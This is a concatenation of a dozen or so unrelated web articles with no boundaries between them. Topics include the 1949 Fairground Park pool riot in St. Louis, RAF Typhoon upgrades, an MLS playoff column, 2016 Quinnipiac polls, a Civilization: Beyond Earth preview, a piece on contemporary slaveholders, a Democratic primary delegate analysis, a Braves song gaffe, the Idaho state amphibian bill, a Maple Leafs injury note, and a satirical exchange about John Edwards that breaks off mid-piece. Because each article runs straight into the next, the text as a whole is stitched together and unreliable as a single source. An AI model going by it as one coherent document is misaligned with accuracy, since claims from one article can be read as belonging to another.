In 1912, three years after Fairground was dedicated as a public park, the city began construction of a swimming pool on the site of the former fair's amphitheater. It was the first municipal pool in the city of St. Louis and, just as the amphitheater had been the largest in the country, the original Fairground Park pool was the largest in the world. It had a diameter of 440 feet, almost one and a half times the length of a football field, and hosted between 10,000 and 12,000 swimmers per day.1
For 37 years the pool provided an escape from the summer heat, but only for white patrons. In 1949, St. Louis city officials decided to open the pool to the city's black residents in response to a federal court's holding that prohibiting blacks from using public golf courses was a violation of the 14th amendment.2
{children Swimming at Fairground Swimming Pool, July 2, 1933 – courtesy Missouri Digital Heritage}
On June 21, 1949, opening day for the city's pools, about thirty African American children entered the pool and swam with white children without incident. However, as they were swimming, a group gathered outside of the pool's fence shouting threats at the African American swimmers. City police were called in to escort the black children out of the park when the swimming period ended around 3 o'clock in the afternoon. Conflicting eyewitness reports suggest simultaneously that the children were not subject to violence while they were under the police escort and that despite the police escort, white teenagers would periodically strike the black children without police reprisal. Reports of violence against African American youths were called into the city police throughout the 3 and 4 o'clock hours on this day.3
{African-American and Caucasian Children at Fairground Swimming Pool, June 21, 1949 – courtesy Missouri Digital Heritage}
By 6:45 p.m., witnesses reported that a crowd of several hundred had gathered. Only 20 to 30 of the people gathered were African American youths. White boys with baseball bats surrounded a group of black boys, one of who was said to have a knife, and beat one of the African American youths until a police officer fell on top of the victim to stop the attack. At this point, the riot report suggests, the original crowd of several hundred swelled to the thousands as other park users and baseball fans on their way to Sportsman's Park heeded the apparently false cry that an African American boy had killed a white youth. The violence that resulted required the involvement of nearly 150 police officers. Relative order was established by the 10 o'clock hour, though crowds did not disperse completely until after midnight.4 The mayor immediately reinstituted segregation policies in order to minimize the potential for future violence.
{an unidentified young man being beaten during the riot over the Fairground Pool desegregation. Photograph © 1949 by Buel White of the St. Louis Post-Dispatch – courtesy Missouri History Museum}
LIFE Magazine publicized the riot to a national audience in its July 4, 1949 issue, reporting eight arrests as a result of the violence, and noting that seven of the eight people arrested were injured. The magazine, however, did not provide information about the racial identities of those arrested or injured, instead highlighting the criminality and the bodily harm. However, the official report states that only seven people – three whites and four blacks – were arrested; this despite the fact that, of the six people who were seriously injured, five were African American. Three African Americans and one of the white youths who were arrested were ultimately charged with inciting a riot according to the official report.5 LIFE also claimed that 400 police officers intervened to restore order, as opposed to 150 officers as stated in the official report. These conflicting reports are probably the result of the purpose of each of these publications as the official report was to provide the political record of the event whereas the LIFE Magazine article played upon national concerns about racial integration.
{LIFE magazine article from July 4, 1949 – courtesy Google Books}
George Schermer authored the official published report of the riot for the St. Louis Council on Human Relations entitled “The Fairgrounds Park Incident.” Schermer concludes that “community leaders” believed that “only a very small number of persons of the ‘hoodlum' type were actually involved.” According to this report, the leaders believed that the majority of the city's residents did not approve of the violence and “that highlighting the story in the press and labeling it a ‘race riot' has been an injustice to the City.”6 The ultimate result of this report was to downplay the role of race in the riot to ensure that St. Louis did not become synonymous with racial violence the way that Detroit, Chicago, and East St. Louis previously had. Even the title of the report downgrades the riot to an “incident.”
This “incident,” however, serves to highlight many issues that are central to St. Louis's racial history. In March 2002, The Riverfront Times published “The Longest Day,” in which Eddie Silva opens by describing a scene from the race riot that, he argues, “has been erased from the city's collective memory.” This article revisited the significance of the riots in the context of race relations in St. Louis after a particularly violent summer in 2001 that “turned Fairgrounds Park into yet another symbol of racial fear.” A 2009 Post-Dispatch article, on the 60th anniversary of the pool riot, identified the riot as “pivotal” to the history of race relations in the city. The recollections of Robert Gammon, an African American who was 13 at the time of the riot, serve as the centerpiece for this article. In this video, Gammon recalls his experience of the riots as he visits the site with a reporter from the St. Louis Post-Dispatch.
{view of Fairground Park Pool today – photo by author}
We don't talk about this part of our history because it forces us to confront the city's racial divisions. However, not talking about the riot does not mitigate its effects on the city's racial history or its effects on the city's current racial climate. In 1950, the year after the riot, public pools were integrated once more, this time without incident. Within the first year after integration, though, attendance at the Fairground Park Pool decline by 80%.7 By 1954, the pool was no longer profitable enough to be maintained appropriately, and the city closed it down. Between 1950 and 1960, the population of the city of St. Louis dropped by 107,000 residents while the number African American residents increased by 10%. The demographic shift created by white flight from the city began in earnest at the same time that the Fairground Park Pool became an integrated facility.
I do not mean to imply that white residents left the city because the pool was integrated, but rather, I believe that the pool and the riot are symbolic of larger social issues with respect to race in the mid-20th century. At the time, city officials sought to quell fears of the effects of racial integration though the actions of city residents suggest that the political rhetoric had little effect. In retrospect, it is clear that the Fairground Park Pool riot was a more significant occurrence than city officials were willing to admit. To ignore the riot is to ignore the history of race relations in St. Louis. And to ignore the history is to ignore the legacy that shapes race relations in our city today.
BAE Systems has provided further reassurance that the Eurofighter Typhoons serving with the UK Royal Air Force (RAF)can fully take over the ground-attack and strike roles from the service's Tornado fleet, which is due to be retired by March 2019. The company is promising “a seamless transition of capability from Tornado to Typhoon by the end of 2018.” But one key RAF Tornado capability is not scheduled for transfer— the Reconnaissance Airborne Pod for TORnado (RAPTOR)—even though it is currently providing vital imagery over Iraq and Syria to the coalition partners engaged in Operation Inherent Resolve.
The RAF has named the transfer of capabilities from Tornado to Typhoon as Project Centurion, an effort in three phases. Phase One Enhancement (P1E) of the Typhoon has included the integration of Raytheon Paveway IV laser/GPS-guided bombs. P1E entered service last year, although the BAE statement said that the RAF is now operationally evaluating “further work” to deliver “small improvements” to P1E. This further work “is providing lessons learnt for the forthcoming packages, while achieving the first step on the journey and setting the standard of how the RAF and industry can work effectively together,” said BAE Systems technical manager Paul Ascroft.
Phase Two Enhancements (P2E) include what BAE Systems now describes as “initial integration” of MBDA's Meteor BVRAAM and Storm Shadow air-to-surface cruise missile. P2E also includes additional human-machine interface (HMI) and availability improvements, according to BAE Systems.
“Final integration” of both weapons is part of P3E, which also includes the MBDA Brimstone 2 close air support weapon. At the Farnborough Airshow last July, BAE Systems flew a Typhoon fitted with Paveway IV, Meteor and Brimstone weapons, but not Storm Shadow. In our report at the show, AIN noted the particular integration challenges for the Typhoon of adding this heavy cruise missile.
The RAPTOR pod is similarly heavy, and is too large to fit on the optimum centerline station of the Typhoon, because of inadequate clearance between the aircraft's extended undercarriage doors. UTA Aerospace Systems (UTAS) has proposed an adaptation of the Typhoon's centerline fuel tank to carry a significantly upgraded version of the RAPTOR. UTAS predecessor Goodrich delivered the RAPTOR to the RAF from 2001, and subsequently downsized and sold it as the DB-110 sensor to more than a dozen air forces, mostly for their F-16s.
In the proposed Fast Jet Pod 2 (FJP2) for the Typhoon, UTAS would include the multispectral imagery upgrade that converts the DB-110 to MS-110 configuration, as described by the company to AIN at Farnborough last July. The FJP2 could alternatively house the tactical synthetic aperture radar (TacSAR) that UTAS launched in a joint venture with Leonardo (then Selex Galileo) at the previous Farnborough airshow in 2014.
Admit it, you were hoping for a little bit of clarity this week.
While the wide-open chase for the postseason is exciting, maybe a couple of the bubble teams could've lost, just to click the playoff picture slightly more into focus, right?
Well, there was no such luck, as Columbus and San Jose broke out the defibrillator paddles and – clear! – kept their seasons alive with improbable wins against teams ahead of them in the standings.
Vancouver also stayed in the hunt in the West with a surprising road win, while Portland stayed above the red line, edging Colorado 1-0 courtesy of a classy lob from Diego Valeri.
CHECK OUT THE LATEST MLS STANDINGS
In the East, New England, Houston, and Sporting Kansas City all kept pace, and New York went top of the Supporters' Shield standings with a 1-0 squeaker over FC Dallas, who, despite the loss, are still only five points out of a Western Conference playoff spot with five games to go.
Remember how last week there were just five points separating teams 4-8 in the East, and only six separating that same group in the West?
This week, that margin is down to five points in each conference.
Even the marquee match of the week, Seattle at LA, didn't resolve that much, exciting as it was. The game unfolded without two of its most important players, Clint Dempsey and Landon Donovan – both of whom should have a lot to say about their teams' postseason fortunes – and it ended in a 1-1 tie.
There are only three teams – New York, Seattle and Portland – assured of finishing above .500, creating a sense that many of the current playoff places could be rearranged before the dust settles on the regular season.
With that in mind, let's look at the recently up-and-down Montreal Impact, a team seemingly capable of a deep run into the postseason, or a tumble out of playoff position altogether.
Which will it be?
Setting the Pace
In just their second year of existence, Montreal jumped out to the fastest start in the league, going 8-2-2 in their first 12 games, and leading the Supporters' Shield standings all spring.
They established an identity as a solid, counterattacking side with a deadly finisher in Marco Di Vaio, the league's leading scorer, and a quality midfield led by a resurgent Justin Mapp, Felipe and Patrice Bernier.
They did show some defensive flaws, though, and a five-game winless streak knocked them off track during the summer. To address those problems on D, the Impact acquired Spanish defender Adrián López and Argentine holding midfielder Hernán Bernardello.
And as Bernardello, a Designated Player, settled into their midfield, Montreal rebounded. They walloped Houston 5-0 in late August, and returned to the top of the table.
Crunch Time
But Bernardello and López both went down with injuries in early September, and the Impact have now dropped two home games in a row, falling to third in the East.
They still have two games in hand on leaders New York, and they are still a team that has lost back-to-back games only twice all season. And consider this current slide: Last week, they narrowly lost to a desperate Columbus Crew – a team that always gives them problems – and this week they fell to Vancouver, 3-0, in the most misleading scoreline of the round.
After a slow start, Montreal outshot and out-possessed Vancouver, and the score was 1-0 until the 89th minute, when substitute Camilo went marauding while Montreal were pushing numbers forward for an equalizer. The Brazilian bagged two late goals to pump up the scoreline.
The Impact also had a penalty decision in their favor controversially overturned in the 38th minute. Whether or not you think it was a handball (head coach Marco Schällibaum, right, certainly did), the reversal of the decision was odd. Referee Jorge Gonzalez had clearly pointed to the spot.
But the last time Montreal dropped two in a row, they bounced back with a four-game unbeaten streak. Can they do it again, or are the Impact in danger of falling below the red line?
Rugged Run-in
One thing is for sure, the stretch run will definitely test Montreal's playoff mettle: Five of their remaining six MLS games are against postseason contenders – and three of those are on the road.
Next week, they travel to Toyota Park to take on Chicago, who are one point shy of the playoff places and clawing for their postseason lives. If they lose that one, the Impact could find themselves in fourth place heading into the following week's trip to BBVA Compass Stadium, where they'll take on Houston – who ran riot over Chivas USA this past weekend with Brad Davis, Ricardo Clark, and Boniek García running the show in midfield.
KICK OFF: The table turns as Red Bulls take poll position for the Shield
It won't get easier following that one, as Montreal welcome current fifth-place team New England to Stade Saputo before flying to Los Angeles to take on the defending champion Galaxy.
Montreal kicks all of this off with a CONCACAF Champions League game Tuesday night, and they finish the season against their regional rivals – and extremely willing potential spoilers – Toronto FC.
We get tired just looking at that remaining slate – imagine how the Impact's surplus of 30-somethings must feel.
On the other hand, they've shown themselves to be a resilient side this season, and if they can get Bernardello back in the fold in October, he could provide the spark they need to make some postseason noise.
But if Montreal fail to make the playoffs, or fizzle in the first round, their season – scintillating first half aside – will have to be considered a bust.
The race is closest in Iowa, where Hillary Clinton holds a three-point lead over the Republican nominee. | AP Photos Clinton leads Trump in Colorado, Iowa and Virginia
Hillary Clinton holds double-digit leads among likely voters in Colorado and Virginia and a narrow edge over Donald Trump in Iowa, according to a trio of battleground-state Quinnipiac University polls released Wednesday.
In the head-to-head matchups, Clinton leads Trump 49 percent to 39 percent in Colorado. The race is closest in Iowa, where Clinton holds a 3-point lead over the Republican nominee — 47 percent to 44 percent. But in Virginia, where Trump will campaign Saturday in Fredericksburg, Clinton leads by 12 points — 50 percent to 38 percent.
Clinton drew wide advantages among women in all three swing states, leading Trump 53 percent to 34 percent in Colorado, where men were largely split. Colorado men likely to vote in November backed Clinton over Trump 45 percent to 43 percent, while the Democratic nominee holds a 13-point edge among independent voters and a smaller, 7-point advantage among white Colorado voters (47 percent to 40 percent). Among nonwhite voters in Colorado, Clinton leads 64 percent to 29 percent.
The gender gap between Clinton and Trump voters in Colorado is similar in Virginia, where the former secretary of state leads by 25 points (56 percent to 31 percent) among women and men favor Trump slightly, by 4 points (46 percent to 42 percent). Independent voters in Virginia prefer Clinton 43 percent to 37 percent, while Trump holds a similar 7-point edge among white voters (48 percent to 41 percent). Clinton is the choice of 69 percent of nonwhite voters in Virginia, compared with 17 percent going for Trump.
The disparity between men and women is most pronounced in Iowa, where Clinton carries an 18-point lead among women (56 percent to 38 percent), while Trump had a 14-point advantage with men (51 percent to 37 percent). Among Iowa independents, Trump earned 45 percent support, while 41 percent opted for Clinton.
Both Clinton and Trump are seen unfavorably by at least 50 percent of voters in all three states.
As far as Clinton supporters' main motivation for their backing of the Democratic nominee, 37 percent in Colorado said they are primarily voting for her, while 48 percent said they are casting their ballot to defeat Trump. Another 13 percent said they support the Democratic nominee regardless. In Iowa, the results were similar, with 49 percent of Clinton voters indicating that they are anti-Trump, 36 percent pro-Clinton and 8 percent for the party's nominee. A plurality of 44 percent of Clinton's Virginia voters, as well, indicated that their preference comes from opposing Trump, while 32 percent said they are pro-Clinton and 18 percent said they are supporting the Democratic Party's choice.
Trump supporters in all three states, meanwhile, were more adamant that their vote in favor of the Manhattan businessman is more of an anti-Clinton protest.
Slightly more than 1 in 5 of Trump's Colorado supporters (22 percent) said they are pro-Trump, while 62 percent said they are anti-Clinton and 10 percent said they are supporting the GOP nominee. In Iowa, 28 percent said they are motivated for Trump, while 53 percent said they are against Clinton and 14 percent for the nominee. A similar share of 23 percent of Trump's supporters in Virginia said they are voting for him more because they like him, while 61 percent said they are anti-Clinton, with 10 percent saying they are sticking with the party.
The top-line margins are largely the same with Libertarian nominee Gary Johnson and the Green Party's Jill Stein included in a four-way ballot test. In Colorado, Clinton leads Trump 41 percent to 33 percent, with 16 percent choosing Johnson and 7 percent Stein. About 41 percent of likely Iowa voters backed Clinton, with 39 percent for Trump, 12 percent for Johnson and 3 percent for Stein. Among likely voters in Virginia in the four-way race, Clinton topped Trump 45 percent to 34 percent, while Johnson took 11 percent and Stein grabbed 5 percent.
The polls were conducted via landlines and cellphones from Aug. 9-16, surveying 830 likely voters in Colorado, with a margin of error of plus or minus 3.4 percentage points; 846 likely voters in Iowa, with a margin of error of plus or minus 3.4 percentage points; and 808 likely voters in Virginia, with a margin of error of plus or minus 3.5 percentage points.
Civilisation successor Alpha Centauri may have sold fewer copies than any of the games from its parent series, but that hasn't stopped Firaxis from trying again with a spiritual successor, Civilization: Beyond Earth. As was the case with its predecessor, Beyond Earth tasks the player with leading an expedition to colonise an alien world. The eight or so minutes we see of the game's alpha is familiar: we've landed on an alien world nicely divided into Civ tiles, and our explorer unit has scouted to the north and south of our base.
The world is made up of lush alien forests, deep rift canyons with magma glowing at the bottom of them, arid deserts, and more. Of particular interest is a green mist called miasma, an environmental hazard that damages your units if you end your turn in it. It is also used as a weapon by creatures called Manticores, who hurl balls of it from afar. There are Manticores to the north of our position, so we avoid them for now, as aliens on the planet act as a single faction: aggro one, and you aggro them all.
To the south of our base is a resource pile from earth, which grants us some Energy, a currency used to purchase buildings and units. Below that is Fort Miller, an independent settlement that we decide to trade with, and purple floating stones known as Floatstone, which are needed for certain buildings and units.
Elsewhere, a gigantic Dune-style Siege Worm burrows through the landscape. Very aggressive and dangerous, Siege Worms require the coordinated efforts of several military units to bring down and can destroy the contents of entire tiles simply by crossing through them.
We give it a wide berth, and instead investigate a large alien skeleton nearby. The planet is covered in explorable stuff like this, and when our explorer completes his expedition in a few turns, we will get resources or possibly even an alien unit we can control.
We are now prompted for a quest decision. “With Civilisation the story is what the player does. The quests are there to provide additional interesting decisions,” says 2K's Pete Murray. For example, we have completed a quest called “Gifts from Home” and received a bonus to our Science stat, as well as a gene vault – an early-game wonder that preserves genetic material from Earth.
Our latest quest is called “For Your Eyes Only”, and involves sending a spy from our agency to the city of a rival faction (the American Reclamation Corporation) to see what he can find. The act of sending him generates Intrigue, and the longer he's there, the more he can do – smuggle energy out, or plant attractors for siege worms, for example.
The American Reclamation Corporation faction is in our sights because it is one of several NPCs that does not share our plans for the planet. These plans are expressed as one of three affinities, and due to the choices we have made so far ours is Supremacy: we believe that humans should be independent of the planet they are on, and we believe technology will be our saviour. As such, we aren't opposed to things like augmentation and cybernetics. This affinity gives our buildings an angular and dark architecture with gold highlights for easy identification. It also means that our Supremacy units work better in tightly-formed groups than they do alone, as they dish out buffs to adjacent units.
We can gain affinity levels by investigating ruins and uncovering resource pods, but it's mainly achieved through the game's tech web. On this screen there are large branches for broad technologies like computing, and beneath these sit “leaf” technologies like autonomous systems. These leaf technologies are often tied to a specific affinity, so what we select determines our outlook.
Susan Fielding of the American Reclamation Corporation does not share our enthusiasm for the blending of man and machine. Her faction's affinity is Purity, distinguished by her white flowing clothes, gold leaf trim, and desire to preserve humans exactly as they are.
In her view, this new world needs to be a new Earth, and it is up to the planet to adapt to us rather than vice versa.
Susan may become a problem later, but right now our focus is on Fahrain, an African fellow whose green clothes betray his faction's Harmony leanings – that is, he believes that humans must be integrated into the planet via things like gene splicing. Fahrain is forefront in our mind because he has Firaxite, a resource used by Supremacy factions to create special units. We've offered to trade for it and been declined, so we've assembled an army on his borders.
A quick shift to the game's orbital layer shows our troops are backed up by a tactical satellite, which improves their combat capabilities and HP regeneration. Satellites can also be manufactured to do things like push away or attract miasma, increase the energy yield of the tiles beneath them, or even damage units directly. With such a backing, the battle is short and lop-sided. All Fahrain's units are destroyed, and we capture and convert his buildings, whose architecture now reflects their inhabitants' new-found love of technology. And thus ends our demo.
Alpha Centauri may not have sold well, but it was a critical hit, and with many of its developers working on Beyond Earth, there is little reason to doubt Firaxis can create another winner. The game is instantly recognisable as a Civilization title circa Civ V, but the orbital layer and tech web look like they will keep Beyond Earth from being simply “Civ in space”. The good news is that we won't need to wait long to find out: Civilization: Beyond Earth is due out on Windows PC, Mac, and Linux in the second half of this year.
With more customers around the world doing their shopping online it is increasingly crucial for businesses to have an online presence to reach a lucrative global customer base.
Online businesses are able to benefit from the capabilities to access customer data and see in-depth buying habits to demographic data that can be valuable for optimizing sales as well as increasing customer acquisition and retention.
With ecommerce being a global phenomenon, it can be interesting to dig down to see which countries have taken towards online shopping significantly by spending the most money online in 2015.
Using the data compiled by Statista's Digital Market Outlook we at Expert Market have managed to rank the countries that spend the most money online per average customer. The amounts are all based on US dollars to make it easier for comparison.
We have created the map below to display these numbers across the world and to compare the online spending of different continents.
Share this Infographic On Your Site:
Please include attribution to https://www.expertmarket.co.uk/crm-systems/ with this infographic.
People like stories about heroes rescuing the exploited and enslaved. Films like Amistad provide thrilling narratives, in which good white people like John Quincy Adams defy convention to free the unjustly chained from bondage. Similarly, journalist Nicholas Kristof famously live-tweeted a police raid on a Cambodian brothel, supposedly so that his followers could experience the freeing of victims of human trafficking in real time. Awesome heroes, evil antagonists, dramatic, instantaneous liberation: It's easy to see these stories' appeal.
Some 15 years ago, Austin Choi-Fitzpatrick was involved in one of those supposedly heroic narratives. In 2001, Choi-Fitzpatrick was horrified by stories of the exploitation and trafficking of girls in India. He joined a nonprofit and started taking part in sting operations, trying to get young girls out of brothels. What he discovered, however, was that the story of salvation and emancipation didn't work out in real life. The girls he helped rescue were mostly placed in poorly run, underfunded orphanages. Many of them ran away—often back to brothels. Choi-Fitzpatrick realized he wasn't helping. Indeed, in many ways, rescue groups and exploiters mirrored each other. Neither asked those in bondage what they needed, or what they wanted. The rescuers did not, and in many cases did not even try, to give enslaved people agency.
Choi-Fitzpatrick is now an assistant professor at the Kroc School of Peace studies at the University of San Diego. His recent book, What Slaveholders Think: How Contemporary Perpetrators Rationalize What They Do, takes an innovative approach to analyzing and understanding the often-complicated reality of modern-day slavery and exploitation. Over a year and a half, Choi-Fitzpatrick interviewed 300 people, including slaveholders in India using exploited labor (mostly in agriculture), people from the slaveholder's communities, and people held in, or previously held in, slavery. Choi-Fitzpatrick also interviewed numerous people from the slaveholder's communities, as well as people held in, or previously held in, slavery.
Through his research, Choi has helped illuminate how anti-slavery and anti-trafficking advocates and slaveholders alike often treat the disempowered with paternalistic condescension. And he ended up with a unique perspective on what liberation means—and on the importance of asking those in bondage what liberation actually means to them, instead of relying on the people doing the rescuing (or slaveholding).
In India, slavery is often accomplished through debt bondage. Poor lower-caste agricultural workers have little access to credit. They do not have money to pay for a wedding or a burial, or even to make emergency purchases of food. Desperate workers can borrow money from business people who specialize in this type of high-risk lending. In return for the emergency cash, the debtors do manual fieldwork for long hours—one of Choi-Fitzpatrick's informers notes that the advantage of debtors is that you can make them work longer. Over time, workers accrue more debts. Sometimes, because they have little education, they may not be able to calculate when they have worked the debt off.
“People with no resources are taken advantage of by people who have social, economic, and political power,” Choi-Fitzpatrick explains. “Marginalized people end up trapped in cycles of debt that last for years, and in cases I've seen end up lasting decades and even generations.”
Slaveholders in India exploit workers and in some cases use violence against them. Nonetheless, Choi-Fitzpatrick's interviewees did not see themselves as villains. Moreover, their communities, and even in many cases the workers themselves, did not see the slaveholders as villains. Instead, the relationship between slaveholders and the people they exploit is viewed, as it was in the American South, in a context of paternalism.
As one of Choi-Fitzpatrick's interviewees said, “I am a master. I have employed people and done so much for them. I have fulfilled my duties toward my servant. They should realize this and fulfill their duties as a servant.” Slaveholders think of themselves as “caretakers,” Choy-Fitzpatrick says, and the culture around them generally validates that view.
Slaveholders, in other words, think that they are righteous benefactors helping the weak—just as anti-slavery advocates think they are righteous benefactors helping the weak. To an observer, anti-slavery interventions may seem less harmful—though raids and state orphanages can also be traumatizing and even dangerous when they expose victims to abusive police. The downsides of rescue work can be difficult for the rescuers to understand, points out Choi-Fitzpatrick, because they, like the slaveholders, have “the sense that they're going to go in and rescue people who are completely exploited, who have no agency, and the only thing standing between them and their horrible lives and true freedom is the act of an intervening savior.”
This kind of paternalist condescension needs to go if anti-slavery groups are to be effective, Choi-Fitzpatrick says. These advocates, according to Choi-Fitzpatrcik, need to ” work with communities and individuals in community so that they are able to be in the forefront of their own emancipation.” In his opinion, successful efforts to help exploited people will likely look more like community organizing or labor organizing than like police raids.
In his book, Choi-Fitzpatrick notes that there is evidence to back up this alternative approach. Non-paternalistic projects, focused on changing social conditions rather than rescue, have been quite effective in India. For example, programs that make food freely available to the poor, or roadwork projects, have reduced the power of slaveholders and given people a way out of debt-bondage. When people don't need to worry about starving, they don't need to go into debt to feed their families. When they can get a decent wage for a day's work, they don't need to accept a slaveholder's offer.
As people have more access to resources, they can make more demands, Choi-Fitzpatrick explains. Rather than being saved, they gain the power to demand their own rights, much to the chagrin of their self-styled owners—and sometimes to the chagrin their saviors. Choi-Fitzpatrick notes that in many cases, people in exploitive situations may have different goals than the advocates hoping to help them. For example, their main goal may not be immediate emancipation, but more access to schools for their children. More education, though, can be a first step toward other rights. Slaveholders Choi-Fitzpatrick talked to openly complained that more education weakened their hold on workers.
Slaveholders believe they know what is best for the people they enslave. Ironically, they see themselves as benevolent saviors, much like Nicholas Kristof did during his brothel raid. It's important to remember that exchanging one paternalism for another isn't empowerment. “We don't know what form freedom will take,” Choi-Fitzpatrick says. To find out, he says, we need to ask those who aren't free.
Update: This story has been updated to give a more accurate representation of the number of people Choi interviewed in India.
This article is part of Quartz Ideas, our home for bold arguments and big thinkers.
Is the Democratic primary rigged? It's become one of the most controversial questions of this election cycle. The mind-numbingly complex delegate system, as well as the party's use of superdelegates, have led some on the left to insist that the process by which Democrats choose presidential nominees is undemocratic. But two new analyses throw cold water on these claims, and Bernie Sanders supporters who think the system is rigged ought to take a hard look at them.
Both CNN and Harvard economics professor Dina Pomeranz decided to figure out what the 2016 primary results would be if the Democratic Party picked its presidential nominee through various alternative systems — for example, eliminating superdelegates, or going solely by the popular vote. And both came to the same conclusion: No matter what system the Democrats used, Hillary Clinton would be winning this primary.
As it is now, the nomination is won by whomever has the most delegates, including pledged delegates and superdelegates. By this metric, Clinton is ahead of Sanders by around 800 delegates. But that's certainly not the only conceivable system by which the party could choose its nominee. Let's look at some of the alternative means by which delegates might be allocated in the Democratic Party.
If superdelegates were eliminated from the process, Clinton would lead Sanders by around 200 delegates. If delegates were distributed proportionally based on each candidate's vote share in each state, Clinton would be ahead of Sanders by about 300 delegates. If the Democratic Party used the Republican Party's delegate rules, Clinton would be leading Sanders by about 1,000 delegates.
Last but not least, if the nomination was decided in the most democratic fashion possible — the popular vote — Clinton would still be winning, because she's received about three million more votes than Sanders has. And that's probably the best counterargument to anybody who claims that the primary was rigged. When the person who won the most votes also wins the nomination, there's no intellectually honest way to argue that the process resulted in an undemocratic outcome.
Now, there are some small discrepancies between Pomeranz's analysis and CNN's, and one big discrepancy which I'll address in a moment. But there was no disagreement about who is winning: Both Pomeranz and CNN concluded that Clinton would be well ahead of Sanders under any of the alternative systems.
So, about that big discrepancy: CNN and Pomeranz both deduced what the delegate count would be if the party distributed delegates on a “winner-take-all” basis in every state. They came up with very different totals from one another: Pomeranz found that this would give Clinton a lead of 1,593 delegates, but CNN pegged her lead at only 499 delegates. My own analysis found that it would give Clinton a 1,359 delegate lead. While these are some big differences, all three of them give Clinton a clear and substantial lead over Sanders.
David McNew/Getty Images News/Getty Images
There are a lot of legitimate arguments a Democrat could make against Clinton: She's not liberal enough, she polls worse against Donald Trump than Sanders, she's too close with the party establishment, and so on. There's merit to all of those. However, there's no legitimate argument that Clinton is winning because the system was rigged against Sanders. Clinton is winning because more people voted for her than Sanders. One can criticize the Democratic primary for a lot of reasons, but not for being undemocratic.
Despite offering Miami fans and others displaced by Hurricane Irma the opportunity to take in Thursday's game at SunTrust Park free of charge, the Atlanta Braves have found themselves drawing the ire and offense of many with a very poor between-innings song choice.
Speakers blared the song "Rock You Like a Hurricane", a move that immediately caught the attention of social media. Hurricane Irma has resulted in many residents, specifically from Miami-Dade County, evacuating as the storm approaches Florida.
Actually, it was "Rock You Like A Hurricane." Still not cool. https://t.co/kBcsG55ndB — clarkspencer (@clarkspencer) September 8, 2017
And then you play an insensitive song. Rock You Like A Hurricane. Really shameful @Marlins @Braves https://t.co/LkUBTz77Oj — AtlanticMontessori (@AtlanticMontess) September 8, 2017
Poor taste award tonight goes to the @braves. At the game against Miami and they're playing rock you like a hurricane between innings #irma — Blotto VonDrinkmore (@BlottoVonDrinkm) September 8, 2017
@Braves Uh. probably could've picked better song than "rock you like a hurricane" today with marlins and hurricane about to hit florida. — Chris (@cscotz) September 8, 2017
A Braves official apologized for the poor taste in song choice with the following statement, per Clark Spencer of the Miami Herald: "'Rock You Like A Hurricane' is on home playlist, should have been pulled. Won't be played again this series."
The House State Affairs Committee today abruptly reversed itself and overwhelmingly passed HB 1, the bill proposed by an Idaho 8th grader to make the Idaho Giant Salamander the official state amphibian; you can read my full story here at spokesman.com. There were just two “no” votes on the committee; HB 1 now moves to the full House with a recommendation that it “do pass.”
Rep. Gayle Batt, R-Wilder, and committee Chairman Tom Loertscher, R-Iona, both said they decided on the change yesterday when the House debated and passed a resolution marking “National Diaper Need Awareness Week.” “I turned to my seatmate and said, “If we have time for a diaper bill, we have time to hear the salamander,'” Batt said. She said earlier she'd wondered “if we should clutter up the system” will bills like that, but the diaper resolution put that concern to rest.
Loerscher said, “If we've got time to talk about diapers on the House floor, we've certainly got time enough to talk about the giant salamander. We've had a young lady come here and do something that's very important to her. She was sent away by the committee, saying it wasn't worthy of discussion. It's time we re-evaluate our position.”
Loertscher and Batt said they hadn't talked with 14-year-old Ilah Hickman since the bill was killed on Jan. 19; they were planning to call the youngster right after today's committee meeting.
Rep. Don Cheatham, R-Post Falls, who opposed HB 1 back in January citing fear of “federal overreach,” switched his vote and supported the bill today. “I was new – I was new to Idaho, really, and the Legislature,” Cheatham explained. “I was trying to show my commitment to the state of Idaho.” Cheatham said he had the idea that designating a state amphibian could somehow impact water litigation in North Idaho, but those fears have been put to rest. “I just feel like it's the right thing to do,” he said of his vote today. “I guess it's part of the learning process of a legislator.” Cheatham's comment prompted this much-remarked editorial cartoon in the Coeur d'Alene Press in January.
Ilah has been pushing for the designation since she studied the issue as a fourth-grader; she's returned to the Legislature each year to present her bill, and has picked up support along the way from school kids across the state and from several herpetologists and other experts. Last year, Ilah's bill passed the Senate on a 33-2 vote, but never got a committee hearing in the House.
This year, the House State Affairs Committee held a hearing within a week of the start of the legislative session, but the bill died on a 10-6 vote; only two Republicans on the committee, Reps. Linden Bateman, R-Idaho Falls, and Lynn Luker, R-Boise, joined the panel's four Democrats to vote in favor of the bill. Today, there were just two “no” votes, from Reps. Vito Barbieri, R-Dalton Gardens, and Ken Andrus, R-Lava Hot Springs.
At the January committee hearing, Andrus told Ilah he'd seen salamanders in his Utah swimming hole as a kid, and they were “ugly, they were slimy, and they were creepy.” Ilah had brought in an actual young Idaho Giant Salamander for the committee to see. The reclusive salamander resides almost exclusively in the state, she said, and at full growth, the pattern on its back resembles a topographical map of Idaho's Bitterroot mountain range. Idaho has 14 state symbols, ranging from its state bird, the mountain bluebird, to its state fruit, the wild huckleberry.
The Toronto Maple Leafs seem likely to start the season with a handful of key players on the shelf due to injury. That could potentially include superstar winger Phil Kessel, who was clearly hobbled at the Maple Leafs' skate on Saturday and left practice very early:
Randy Carlyle says Kessel gave it a try this morning and just didn't feel good. — Jonas Siegel (@jonasTSN1050) October 4, 2014
Kessel has proven enormously durable during his Maple Leafs tenure, but missed Friday evening's preseason contest against the Detroit Red Wings with what Randy Carlyle vaguely described as "general soreness."
As for Kessel's mate, both room and line, Tyler Bozak spent Saturday working out off the ice, which would imply that he's nearly ready to return to action.
More to come...
“Morning, Brock! I see you were reading the Wall Street Journal in your Town Car on the way to work!”
“Hullo, Trip! Indeed I was. Can you push the elevator button for the executive suite? Thanks. You know, I happened to notice that there was an op-ed by Democratic presidential candidate John Edwards in there.”
“Really. I haven't been much paying attention to those liberals out in Iowa. Can you imagine spending the New Year in Des Moines?”
“There aren't even mountains there. Where do people ski? And more important, where do they après ski? The Wal-Mart parking lot? Ha-ha! Oh, dear, you're stepping on my Bally briefcase with your Ferragamo loafer, it seems.”
“Sorry, my boy. Anyway, what does that old Edwards boy have to say? He does have good dental work and trustworthy hair. Maybe he's finally appealing to us, his own income class?”
“Let's take a look, shall we? Hm ‘the bargain of America' ‘skyrocketing education and health care costs' ‘foreclosure crisis' wait a minute! Listen to this: ‘The problem is forty percent of all economic growth over the past 20 years has gone to the top 1% of families.' That's the problem? Egad. Someone pages Mindy. I need a Mylanta!”
More from Edwards:
